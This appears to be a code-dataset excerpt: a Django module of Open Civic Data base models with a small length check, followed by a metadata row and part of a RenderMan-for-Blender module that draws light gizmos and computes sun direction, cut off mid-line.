import re import uuid from django.db import models from django.core.validators import RegexValidator from jsonfield import JSONField from uuidfield import UUIDField from .. import common class OCDIDField(models.CharField): def __init__(self, *args, **kwargs): self.ocd_type = kwargs.pop('ocd_type') if self.ocd_type != 'jurisdiction': kwargs['default'] = lambda: 'ocd-{}/{}'.format(self.ocd_type, uuid.uuid4()) # len('ocd-') + len(ocd_type) + len('/') + len(uuid) # = 4 + len(ocd_type) + 1 + 36 # = len(ocd_type) + 41 kwargs['max_length'] = 41 + len(self.ocd_type) regex = '^ocd-' + self.ocd_type + '/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$' else: kwargs['max_length'] = 300 regex = common.JURISDICTION_ID_REGEX kwargs['primary_key'] = True # get pattern property if it exists, otherwise just return the object (hopefully a string) msg = 'ID must match ' + getattr(regex, 'pattern', regex) kwargs['validators'] = [RegexValidator(regex=regex, message=msg, flags=re.U)] super(OCDIDField, self).__init__(*args, **kwargs) def deconstruct(self): name, path, args, kwargs = super(OCDIDField, self).deconstruct() if self.ocd_type != 'jurisdiction': kwargs.pop('default') kwargs.pop('max_length') kwargs.pop('primary_key') kwargs['ocd_type'] = self.ocd_type return (name, path, args, kwargs) class OCDBase(models.Model): """ common base fields across all top-level models """ created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) extras = JSONField(default='{}', blank=True) class Meta: abstract = True class RelatedBase(models.Model): id = UUIDField(auto=True, primary_key=True) class Meta: abstract = True class LinkBase(RelatedBase): note = models.CharField(max_length=300, blank=True) url = models.URLField(max_length=2000) class Meta: abstract = True class MimetypeLinkBase(RelatedBase): media_type = models.CharField(max_length=100) url = models.URLField(max_length=2000) class Meta: abstract = True class IdentifierBase(RelatedBase): identifier = models.CharField(max_length=300) scheme = models.CharField(max_length=300) class Meta: abstract = True class RelatedEntityBase(RelatedBase): name = models.CharField(max_length=2000) entity_type = models.CharField(max_length=20, blank=True) # optionally tied to an organization or person if it was linkable organization = models.ForeignKey('Organization', null=True) person = models.ForeignKey('Person', null=True) @property def entity_name(self): if self.entity_type == 'organization' and self.organization_id: return self.organization.name elif self.entity_type == 'person' and self.person_id: return self.person.name else: return self.name @property def entity_id(self): if self.entity_type == 'organization': return self.organization_id if self.entity_type == 'person': return self.person_id return None class Meta: abstract = True
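# A quick check (not part of this module) of the max_length arithmetic in
# OCDIDField: len('ocd-') + len(ocd_type) + len('/') + len(uuid) equals
# len(ocd_type) + 41. 'person' is a hypothetical ocd_type.
import uuid

ocd_type = 'person'
sample = 'ocd-{}/{}'.format(ocd_type, uuid.uuid4())
assert len(sample) == 41 + len(ocd_type)  # 47 characters for 'person'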
bsd-3-clause
-3,939,492,258,956,639,000
29.816514
98
0.6234
false
3.687157
false
false
false
prman-pixar/RenderManForBlender
rman_ui/rman_ui_light_handlers/__init__.py
2
43288
import bpy import gpu from gpu_extras.batch import batch_for_shader from ...rfb_utils import transform_utils from ...rman_constants import RMAN_AREA_LIGHT_TYPES from .barn_light_filter_draw_helper import BarnLightFilterDrawHelper from mathutils import Vector, Matrix import mathutils import math _DRAW_HANDLER_ = None _BARN_LIGHT_DRAW_HELPER_ = None _PI0_5_ = 1.570796327 s_rmanLightLogo = dict() s_rmanLightLogo['box'] = [ (-0.5,0.5,0.0), (-0.5,-0.5,0.0), (0.5,-0.5,0.0), (0.5,0.5, 0.0) ] s_rmanLightLogo['point'] = [ (0.1739199623,0.2189011082,0.0), (0.2370826019,0.2241208805,0.0), (0.2889232079,0.180194478,0.0), (0.2945193948,0.1124769769,0.0), (0.2505929922,0.06063637093,0.0), (0.1828754911,0.05504018402,0.0), (0.1310348852,0.09896658655,0.0), (0.1254386983,0.1666840877,0.0) ] s_rmanLightLogo['bouncing_r'] = [ (0.10014534,0.163975795,0.0), (0.02377454715,0.2079409584,0.0), (-0.0409057802,0.162414633,0.0), (-0.09261710117,-0.03967857045,0.0), (-0.1033546419,-0.3941421577,0.0), (-0.1714205988,-0.3935548906,0.0), (-0.1743695606,-0.2185861014,0.0), (-0.1934162612,-0.001801638764,0.0), (-0.2387964527,0.228222199,0.0), (-0.2945193948,0.388358659,0.0), (-0.2800665961,0.3941421577,0.0), (-0.1944135703,0.2262313617,0.0), (-0.1480375743,0.08022936015,0.0), (-0.09632135301,0.2812304287,0.0), (0.03260773708,0.3415349284,0.0), (0.1794274591,0.2497892755,0.0), (0.10014534,0.163975795,0.0) ] s_rmanLightLogo['arrow'] = [ (0.03316599252,-6.536167e-18,0.0294362), (0.03316599252,-7.856030e-17,0.3538041), (0.06810822842,-7.856030e-17,0.3538041), (0,-1.11022302e-16,0.5), (-0.0681082284,-7.85603e-17,0.353804), (-0.0331659925,-7.85603e-17,0.353804), (-0.0331659925,-6.53616e-18,0.029436) ] s_rmanLightLogo['R_outside'] = [ [0.265400, -0.291600, 0.000000], [0.065400, -0.291600, 0.000000], [0.065400, -0.125000, 0.000000], [0.025800, -0.125000, 0.000000], [0.024100, -0.125000, 0.000000], [-0.084800, -0.291600, 0.000000], [-0.305400, -0.291600, 0.000000], [-0.170600, -0.093300, 0.000000], [-0.217900, -0.062800, 0.000000], [-0.254000, -0.023300, 0.000000], [-0.276900, 0.025800, 0.000000], [-0.284500, 0.085000, 0.000000], [-0.284500, 0.086700, 0.000000], [-0.281200, 0.128700, 0.000000], [-0.271200, 0.164900, 0.000000], [-0.254500, 0.196600, 0.000000], [-0.231000, 0.224900, 0.000000], [-0.195200, 0.252600, 0.000000], [-0.149600, 0.273700, 0.000000], [-0.092000, 0.287100, 0.000000], [-0.020300, 0.291600, 0.000000], [0.265400, 0.291600, 0.000000], [0.265400, -0.291600, 0.000000] ] s_rmanLightLogo['R_inside'] = [ [0.065400, 0.019100, 0.000000], [0.065400, 0.133300, 0.000000], [-0.014600, 0.133300, 0.000000], [-0.043500, 0.129800, 0.000000], [-0.065700, 0.119500, 0.000000], [-0.079800, 0.102100, 0.000000], [-0.084500, 0.077400, 0.000000], [-0.084500, 0.075700, 0.000000], [-0.079800, 0.052000, 0.000000], [-0.065700, 0.034100, 0.000000], [-0.043300, 0.022800, 0.000000], [-0.013800, 0.019100, 0.000000], [0.065400, 0.019100, 0.000000] ] s_envday = dict() s_envday['west_rr_shape'] = [ [-1.9994, 0, -0.1652], [-2.0337, 0, 0.0939], [-2.0376, 0, 0.1154], [-2.0458, 0, 0.1159], [-2.046, 0, 0.0952], [-2.0688, 0, -0.2033], [-2.1958, 0, -0.203], [-2.1458, 0, 0.1705], [-2.1408, 0, 0.1874], [-2.1281, 0, 0.2], [-2.1116, 0, 0.2059], [-2.0941, 0, 0.2078], [-1.9891, 0, 0.2073], [-1.9719, 0, 0.2039], [-1.9573, 0, 0.1938], [-1.9483, 0, 0.1786], [-1.9447, 0, 0.1613], [-1.9146, 0, -0.1149], [-1.9049, 0, -0.1127], [-1.8721, 0, 0.1759], [-1.8652, 0, 0.1921], [-1.8507, 0, 0.2021], [-1.8339, 0, 0.2072], [-1.7112, 0, 0.207], [-1.6943, 0, 0.2024], 
[-1.6816, 0, 0.1901], [-1.6744, 0, 0.1742], [-1.6234, 0, -0.2037], [-1.751, 0, -0.2035], [-1.7748, 0, 0.1153], [-1.7812, 0, 0.1166], [-1.7861, 0, 0.1043], [-1.8188, 0, -0.1565], [-1.8218, 0, -0.1738], [-1.83, 0, -0.1894], [-1.8447, 0, -0.1995], [-1.8618, 0, -0.2034], [-1.9493, 0, -0.2037], [-1.967, 0, -0.2024], [-1.9824, 0, -0.1956], [-1.9943, 0, -0.1825] ] s_envday['east_rr_shape'] = [ [1.8037, 0, 0.1094], [1.9542, 0, 0.1094], [1.9604, 0, 0.2004], [1.9175, 0, 0.2043], [1.8448, 0, 0.2069], [1.7493, 0, 0.2082], [1.7375, 0, 0.2079], [1.7258, 0, 0.2066], [1.7144, 0, 0.204], [1.7033, 0, 0.2], [1.6928, 0, 0.1947], [1.6831, 0, 0.188], [1.6743, 0, 0.1802], [1.6669, 0, 0.171], [1.6607, 0, 0.1611], [1.6559, 0, 0.1503], [1.6527, 0, 0.139], [1.6508, 0, 0.1274], [1.6502, 0, 0.1156], [1.6502, 0, -0.1122], [1.6505, 0, -0.1239], [1.6521, 0, -0.1356], [1.6551, 0, -0.147], [1.6597, 0, -0.1578], [1.6657, 0, -0.168], [1.6731, 0, -0.1771], [1.6816, 0, -0.1852], [1.6911, 0, -0.1922], [1.7014, 0, -0.1978], [1.7124, 0, -0.2021], [1.7238, 0, -0.205], [1.7354, 0, -0.2066], [1.7472, 0, -0.207], [1.8528, 0, -0.2058], [1.9177, 0, -0.2028], [1.9602, 0, -0.1993], [1.9541, 0, -0.1082], [1.8006, 0, -0.1084], [1.7892, 0, -0.1054], [1.7809, 0, -0.0968], [1.7789, 0, -0.0851], [1.7793, 0, -0.0471], [1.9329, 0, -0.0469], [1.933, 0, 0.0388], [1.7793, 0, 0.0384], [1.779, 0, 0.0895], [1.7825, 0, 0.1002], [1.792, 0, 0.1083] ] s_envday['south_rr_shape'] = [ [0.1585, 0, 1.654], [0.1251, 0, 1.6444], [0.0918, 0, 1.6383], [0.053, 0, 1.6345], [0.0091, 0, 1.6331], [-0.0346, 0, 1.6347], [-0.0712, 0, 1.6397], [-0.1002, 0, 1.6475], [-0.1221, 0, 1.6587], [-0.142, 0, 1.6791], [-0.1537, 0, 1.7034], [-0.1579, 0, 1.7244], [-0.1599, 0, 1.7458], [-0.1593, 0, 1.7672], [-0.1566, 0, 1.7884], [-0.1499, 0, 1.8088], [-0.1392, 0, 1.8273], [-0.1249, 0, 1.8433], [-0.1079, 0, 1.8563], [-0.0894, 0, 1.8675], [-0.0707, 0, 1.8765], [-0.0139, 0, 1.9013], [0.0258, 0, 1.9185], [0.041, 0, 1.9287], [0.0411, 0, 1.939], [0.0366, 0, 1.9485], [0.0253, 0, 1.9525], [-0.1485, 0, 1.95], [-0.1566, 0, 2.0398], [-0.1297, 0, 2.0462], [-0.0876, 0, 2.0538], [-0.0451, 0, 2.0585], [-0.0024, 0, 2.0603], [0.0403, 0, 2.0591], [0.0827, 0, 2.0534], [0.1231, 0, 2.0397], [0.1537, 0, 2.0102], [0.168, 0, 1.97], [0.1706, 0, 1.9273], [0.1631, 0, 1.8852], [0.1404, 0, 1.8491], [0.106, 0, 1.8236], [0.0875, 0, 1.8137], [-0.0136, 0, 1.7711], [-0.0244, 0, 1.7643], [-0.0309, 0, 1.7558], [-0.031, 0, 1.7462], [-0.0261, 0, 1.7393], [-0.0124, 0, 1.7353], [0.1505, 0, 1.7366] ] s_envday['north_rr_shape'] = [ [-0.144, 0, -2.034], [-0.1584, 0, -2.0323], [-0.1719, 0, -2.0256], [-0.1804, 0, -2.0136], [-0.1848, 0, -1.9996], [-0.185, 0, -1.9849], [-0.185, 0, -1.6235], [-0.0661, 0, -1.6236], [-0.0663, 0, -1.8158], [-0.0672, 0, -1.8303], [-0.0702, 0, -1.8594], [-0.0721, 0, -1.8739], [-0.0654, 0, -1.8569], [-0.048, 0, -1.8169], [-0.0415, 0, -1.8038], [0.0554, 0, -1.65], [0.0641, 0, -1.638], [0.0747, 0, -1.6286], [0.0869, 0, -1.6244], [0.0978, 0, -1.6235], [0.1541, 0, -1.6238], [0.1677, 0, -1.6263], [0.1811, 0, -1.6341], [0.1896, 0, -1.6477], [0.1926, 0, -1.6633], [0.1927, 0, -1.6662], [0.1927, 0, -2.0339], [0.0743, 0, -2.0341], [0.0743, 0, -1.8646], [0.0759, 0, -1.8354], [0.0786, 0, -1.8062], [0.0803, 0, -1.7917], [0.0735, 0, -1.8051], [0.0605, 0, -1.8312], [0.0473, 0, -1.8573], [0.0422, 0, -1.8659], [-0.0534, 0, -2.0154], [-0.0632, 0, -2.0261], [-0.0741, 0, -2.0322], [-0.0909, 0, -2.034] ] s_envday['inner_circle_rr_shape'] = [ [0, 0, -1], [-0.1961, 0, -0.9819], [-0.3822, 0, -0.9202], [-0.5587, 0, -0.8291], 
[-0.7071, 0, -0.707], [-0.8308, 0, -0.5588], [-0.9228, 0, -0.3822], [-0.9811, 0, -0.1961], [-1.0001, 0, 0], [-0.9811, 0, 0.1961], [-0.9228, 0, 0.3822], [-0.8361, 0, 0.5486], [-0.7071, 0, 0.7071], [-0.5587, 0, 0.8311], [-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811], [0, 0, 1.0001], [0.1961, 0, 0.981], [0.3822, 0, 0.9228], [0.5587, 0, 0.8309], [0.7071, 0, 0.7071], [0.8282, 0, 0.5587], [0.9228, 0, 0.3822], [0.9811, 0, 0.1961], [1.0001, 0, 0], [0.9811, 0, -0.1961], [0.9228, 0, -0.3822], [0.831, 0, -0.5587], [0.7071, 0, -0.7071], [0.5587, 0, -0.8308], [0.3822, 0, -0.9228], [0.1961, 0, -0.981] ] s_envday['outer_circle_rr_shape'] = [ [0, 0, -1], [-0.1961, 0, -0.9815], [-0.3822, 0, -0.9202], [-0.5587, 0, -0.8288], [-0.7071, 0, -0.707], [-0.8282, 0, -0.5588], [-0.9228, 0, -0.3822], [-0.981, 0, -0.1961], [-1.0001, 0, 0], [-0.981, 0, 0.1961], [-0.9228, 0, 0.3822], [-0.8308, 0, 0.5538], [-0.7071, 0, 0.7071], [-0.5587, 0, 0.8302], [-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811], [0, 0, 1.0001], [0.1961, 0, 0.981], [0.3822, 0, 0.9228], [0.5587, 0, 0.8279], [0.7071, 0, 0.7071], [0.8308, 0, 0.5587], [0.9228, 0, 0.3822], [0.981, 0, 0.1961], [1.0001, 0, 0], [0.981, 0, -0.1961], [0.9228, 0, -0.3822], [0.8308, 0, -0.5587], [0.7071, 0, -0.7071], [0.5587, 0, -0.8308], [0.3822, 0, -0.9228], [0.1961, 0, -0.9784] ] s_envday['compass_shape'] = [ [0, 0, -0.9746], [-0.2163, 0, -0.0012], [0, 0, 0.9721], [0.2162, 0, -0.0012], [0, 0, -0.9746] ] s_envday['east_arrow_shape'] = [ [1.2978, 0, -0.2175], [1.2978, 0, 0.215], [1.5141, 0, -0.0012], [1.2978, 0, -0.2175] ] s_envday['south_arrow_shape'] = [ [-0.2163, 0, 1.2965], [0.2162, 0, 1.2965], [0, 0, 1.5128], [-0.2163, 0, 1.2965] ] s_envday['west_arrow_shape'] = [ [-1.2979, 0, -0.2175], [-1.2979, 0, 0.215], [-1.5142, 0, -0.0012], [-1.2979, 0, -0.2175] ] s_envday['north_arrow_shape'] = [ [-0.2163, 0, -1.2991], [0.2162, 0, -1.2991], [0, 0, -1.5154], [-0.2163, 0, -1.2991] ] s_diskLight = [ [0.490300, 0.097500, 0.000000], [0.461900, 0.191300, 0.000000], [0.415700, 0.277700, 0.000000], [0.353500, 0.353500, 0.000000], [0.277700, 0.415700, 0.000000], [0.191300, 0.461900, 0.000000], [0.097500, 0.490300, 0.000000], [0.000000, 0.499900, 0.000000], [-0.097500, 0.490300, 0.000000], [-0.191300, 0.461900, 0.000000], [-0.277700, 0.415700, 0.000000], [-0.353500, 0.353500, 0.000000], [-0.415700, 0.277700, 0.000000], [-0.461900, 0.191300, 0.000000], [-0.490300, 0.097500, 0.000000], [-0.499900, 0.000000, 0.000000], [-0.490300, -0.097500, 0.000000], [-0.461900, -0.191300, 0.000000], [-0.415700, -0.277700, 0.000000], [-0.353500, -0.353500, 0.000000], [-0.277700, -0.415700, 0.000000], [-0.191300, -0.461900, 0.000000], [-0.097500, -0.490300, 0.000000], [0.000000, -0.499900, 0.000000], [0.097500, -0.490300, 0.000000], [0.191300, -0.461900, 0.000000], [0.277700, -0.415700, 0.000000], [0.353500, -0.353500, 0.000000], [0.415700, -0.277700, 0.000000], [0.461900, -0.191300, 0.000000], [0.490300, -0.097500, 0.000000], [0.500000, 0.000000, 0.000000], [0.490300, 0.097500, 0.000000] ] s_distantLight = dict() s_distantLight['arrow1'] = [ (0.03316599252,-6.536167e-18,0.0294362), (0.03316599252,-7.856030e-17,0.5), (0.06810822842,-7.856030e-17,0.5), (0,-1.11022302e-16, 1.0), (-0.0681082284,-7.85603e-17,0.5), (-0.0331659925,-7.85603e-17,0.5), (-0.0331659925,-6.53616e-18,0.029436) ] s_distantLight['arrow2'] = [ (0.03316599252,-0.5,0.0294362), (0.03316599252,-0.5,0.5), (0.06810822842,-0.5,0.5), (0,-0.5, 1.0), (-0.0681082284,-0.5,0.5), (-0.0331659925,-0.5,0.5), (-0.0331659925,-0.5,0.029436) ] s_distantLight['arrow3'] = [ 
(0.03316599252,0.5,0.0294362), (0.03316599252,0.5,0.5), (0.06810822842,0.5,0.5), (0,0.5, 1.0), (-0.0681082284,0.5,0.5), (-0.0331659925,0.5,0.5), (-0.0331659925,0.5,0.029436) ] s_portalRays = [ (-1, 0, 0), (-2, 0, 0), (-1, 0, 0), (-1, 0, -1), (-2, 0, -2), (-1, 0, -1), ( 0, 0, -1), ( 0, 0, -2), ( 0, 0, -1), ( 1, 0, -1), ( 2, 0, -2), ( 1, 0, -1), ( 1, 0, 0), ( 2, 0, 0), ( 1, 0, 0), ( 1, 0, 1), ( 2, 0, 2), ( 1, 0, 1), ( 0, 0, 1), ( 0, 0, 2), ( 0, 0, 1), (-1, 0, 1), (-2, 0, 2), (-1, 0, 1), (-1, 0, 0) ] s_cylinderLight = dict() s_cylinderLight['vtx'] = [ [-0.5, -0.4045, -0.2938], [-0.5, -0.1545, -0.4755], [-0.5, 0.1545, -0.4755], [-0.5, 0.4045, -0.2938], [-0.5, 0.5, 0], [-0.5, 0.4045, 0.2938], [-0.5, 0.1545, 0.4755], [-0.5, -0.1545, 0.4755], [-0.5, -0.4045, 0.2938], [-0.5, -0.5, 0], [-0.5, -0.4045, -0.2938], [0.5, -0.4045, -0.2938], [0.5, -0.1545, -0.4755], [0.5, 0.1545, -0.4755], [0.5, 0.4045, -0.2938], [0.5, 0.5, 0], [0.5, 0.4045, 0.2938], [0.5, 0.1545, 0.4755], [0.5, -0.1545, 0.4755], [0.5, -0.4045, 0.2938], [0.5, -0.5, 0], [0.5, -0.4045, -0.2938] ] s_cylinderLight['indices'] = [ (0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, 6), (6, 7), (7, 8), (8, 9), (9, 10), (11, 12), (12, 13), (13, 14), (14, 15), (15, 16), (16, 17), (17, 18), (18, 19), (19, 20), (20, 21), (0, 11), (2, 13), (4, 15), (6, 17), (8, 19) ] _SHADER_ = None if not bpy.app.background: _SHADER_ = gpu.shader.from_builtin('3D_UNIFORM_COLOR') _SELECTED_COLOR_ = (1, 1, 1) _WIRE_COLOR_ = (0, 0, 0) if 'Default' in bpy.context.preferences.themes: _SELECTED_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.object_active _WIRE_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.wire def set_selection_color(ob): global _SELECTED_COLOR_, _WIRE_COLOR_ if ob in bpy.context.selected_objects: col = (_SELECTED_COLOR_[0], _SELECTED_COLOR_[1], _SELECTED_COLOR_[2], 1) else: col = (_WIRE_COLOR_[0], _WIRE_COLOR_[1], _WIRE_COLOR_[2], 1) _SHADER_.uniform_float("color", col) def _get_indices(l): indices = [] for i in range(0, len(l)): if i == len(l)-1: indices.append((i, 0)) else: indices.append((i, i+1)) return indices def _get_sun_direction(ob): light = ob.data rm = light.renderman.get_light_node() m = Matrix.Identity(4) m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') month = float(rm.month) day = float(rm.day) year = float(rm.year) hour = float(rm.hour) zone = rm.zone latitude = rm.latitude longitude = rm.longitude sunDirection = Vector([rm.sunDirection[0], rm.sunDirection[1], rm.sunDirection[2]]) if month == 0.0: return sunDirection if month == 1.0: dayNumber = day elif month == 2.0: dayNumber = day + 31.0 else: year_mod = 0.0 if math.fmod(year, 4.0) != 0.0: year_mod = 0.0 elif math.fmod(year, 100.0) != 0.0: year_mod = 1.0 elif math.fmod(year, 400.0) != 0.0: year_mod = 0.0 else: year_mod = 1.0 dayNumber = math.floor(30.6 * month - 91.4) + day + 59.0 + year_mod dayAngle = 2.0 * math.pi * float(dayNumber - 81.0 + (hour - zone) / 24.0) / 365.0 timeCorrection = 4.0 * (longitude - 15.0 * zone) + 9.87 * math.sin(2.0 * dayAngle) - 7.53 * math.cos(1.0 * dayAngle) - 1.50 * math.sin(1.0 * dayAngle) hourAngle = math.radians(15.0) * (hour + timeCorrection / 60.0 - 12.0) declination = math.asin(math.sin(math.radians(23.45)) * math.sin(dayAngle)) elevation = math.asin(math.sin(declination) * math.sin(math.radians(latitude)) + math.cos(declination) * math.cos(math.radians(latitude)) * math.cos(hourAngle)) azimuth = math.acos((math.sin(declination) * math.cos(math.radians(latitude)) - math.cos(declination) * math.sin(math.radians(latitude)) * 
math.cos(hourAngle)) / math.cos(elevation)) if hourAngle > 0.0: azimuth = 2.0 * math.pi - azimuth sunDirection[0] = math.cos(elevation) * math.sin(azimuth) sunDirection[1] = max(math.sin(elevation), 0) sunDirection[2] = math.cos(elevation) * math.cos(azimuth) return m @ sunDirection def make_sphere(m): lats = 12 longs = 20 radius = 0.5 v = [] i = 0 j = 0 for j in range(0, longs+1): lng = 2 * math.pi * float (j / longs) x = math.cos(lng) y = math.sin(lng) for i in range(0, lats+1): lat0 = math.pi * (-0.5 + float(i/ lats)) z0 = math.sin(lat0) * radius zr0 = math.cos(lat0) * radius v.append( m @ Vector((x*zr0, y*zr0, z0))) for i in range(0, lats+1): lat0 = math.pi * (-0.5 + float(i / lats)) z0 = math.sin(lat0) * radius zr0 = math.cos(lat0) * radius v.append( m @ Vector((-x*zr0, -y*zr0, z0))) for i in range(0, lats+1): lat0 = math.pi * (-0.5 + float(i / lats)) z0 = math.sin(lat0) * radius zr0 = math.cos(lat0) * radius for j in range(0, longs+1): lng = 2 * math.pi * (float(j / longs)) x = math.cos(lng) y = math.sin(lng) v.append( m @ Vector((x*zr0, y*zr0, z0))) return v def draw_rect_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') box = [] for pt in s_rmanLightLogo['box']: box.append( m @ Vector(pt)) box_indices = _get_indices(s_rmanLightLogo['box']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box}, indices=box_indices) batch.draw(_SHADER_) arrow = [] for pt in s_rmanLightLogo['arrow']: arrow.append( m @ Vector(pt)) arrow_indices = _get_indices(s_rmanLightLogo['arrow']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt)) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_sphere_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m @ Vector(pt) ) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m3 = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') disk = [] for pt in s_diskLight: disk.append( m3 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt)) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) 
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_envday_light(ob): _SHADER_.bind() set_selection_color(ob) loc, rot, sca = Matrix(ob.matrix_world).decompose() axis,angle = rot.to_axis_angle() scale = max(sca) # take the max axis m = Matrix.Translation(loc) m = m @ Matrix.Rotation(angle, 4, axis) m = m @ Matrix.Scale(scale, 4) ob_matrix = m m = Matrix(ob_matrix) m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') west_rr_shape = [] for pt in s_envday['west_rr_shape']: west_rr_shape.append( m @ Vector(pt)) west_rr_indices = _get_indices(s_envday['west_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_rr_shape}, indices=west_rr_indices) batch.draw(_SHADER_) east_rr_shape = [] for pt in s_envday['east_rr_shape']: east_rr_shape.append( m @ Vector(pt)) east_rr_indices = _get_indices(s_envday['east_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_rr_shape}, indices=east_rr_indices) batch.draw(_SHADER_) south_rr_shape = [] for pt in s_envday['south_rr_shape']: south_rr_shape.append( m @ Vector(pt)) south_rr_indices = _get_indices(s_envday['south_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_rr_shape}, indices=south_rr_indices) batch.draw(_SHADER_) north_rr_shape = [] for pt in s_envday['north_rr_shape']: north_rr_shape.append( m @ Vector(pt) ) north_rr_indices = _get_indices(s_envday['north_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_rr_shape}, indices=north_rr_indices) batch.draw(_SHADER_) inner_circle_rr_shape = [] for pt in s_envday['inner_circle_rr_shape']: inner_circle_rr_shape.append( m @ Vector(pt) ) inner_circle_rr_shape_indices = _get_indices(s_envday['inner_circle_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": inner_circle_rr_shape}, indices=inner_circle_rr_shape_indices) batch.draw(_SHADER_) outer_circle_rr_shape = [] for pt in s_envday['outer_circle_rr_shape']: outer_circle_rr_shape.append( m @ Vector(pt) ) outer_circle_rr_shape_indices = _get_indices(s_envday['outer_circle_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": outer_circle_rr_shape}, indices=outer_circle_rr_shape_indices) batch.draw(_SHADER_) compass_shape = [] for pt in s_envday['compass_shape']: compass_shape.append( m @ Vector(pt)) compass_shape_indices = _get_indices(s_envday['compass_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": compass_shape}, indices=compass_shape_indices) batch.draw(_SHADER_) east_arrow_shape = [] for pt in s_envday['east_arrow_shape']: east_arrow_shape.append( m @ Vector(pt)) east_arrow_shape_indices = _get_indices(s_envday['east_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_arrow_shape}, indices=east_arrow_shape_indices) batch.draw(_SHADER_) west_arrow_shape = [] for pt in s_envday['west_arrow_shape']: west_arrow_shape.append( m @ Vector(pt) ) west_arrow_shape_indices = _get_indices(s_envday['west_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_arrow_shape}, indices=west_arrow_shape_indices) batch.draw(_SHADER_) north_arrow_shape = [] for pt in s_envday['north_arrow_shape']: north_arrow_shape.append( m @ Vector(pt)) north_arrow_shape_indices = _get_indices(s_envday['north_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_arrow_shape}, indices=north_arrow_shape_indices) batch.draw(_SHADER_) south_arrow_shape = [] for pt in s_envday['south_arrow_shape']: south_arrow_shape.append( m @ Vector(pt)) south_arrow_shape_indices = 
_get_indices(s_envday['south_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_arrow_shape}, indices=south_arrow_shape_indices) batch.draw(_SHADER_) sunDirection = _get_sun_direction(ob) sunDirection = Matrix(ob_matrix) @ Vector(sunDirection) origin = Matrix(ob_matrix) @ Vector([0,0,0]) sunDirection_pts = [ origin, sunDirection] batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sunDirection_pts}, indices=[(0,1)]) batch.draw(_SHADER_) # draw a sphere to represent the sun v = sunDirection - origin translate = Matrix.Translation(v) sphere = make_sphere(ob_matrix @ Matrix.Scale(0.25, 4)) sphere_indices = [] for i in range(0, len(sphere)): if i == len(sphere)-1: sphere_indices.append((i, 0)) else: sphere_indices.append((i, i+1)) sphere_shape = [] for pt in sphere: sphere_shape.append( translate @ Vector(pt) ) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere_shape}, indices=sphere_indices) batch.draw(_SHADER_) def draw_disk_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) arrow = [] for pt in s_rmanLightLogo['arrow']: arrow.append( m @ Vector(pt)) arrow_indices = _get_indices(s_rmanLightLogo['arrow']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in 